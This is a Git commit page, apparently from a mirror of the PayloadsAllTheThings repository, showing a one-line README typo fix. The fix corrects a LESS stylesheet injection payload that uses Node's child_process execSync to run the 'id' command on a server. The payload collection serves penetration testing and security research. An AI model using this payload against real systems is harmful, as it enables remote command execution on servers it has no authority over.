mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
Update README.md
Fixes a typo
This commit is contained in:
parent
a0c08e4e87
commit
6841fc21d2
@ -569,7 +569,7 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
||||
|
||||
```less
|
||||
body {
|
||||
color: `global.process.mainModule.require("child_process").execSync("id"`;
|
||||
color: `global.process.mainModule.require("child_process").execSync("id")`;
|
||||
}
|
||||
```
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user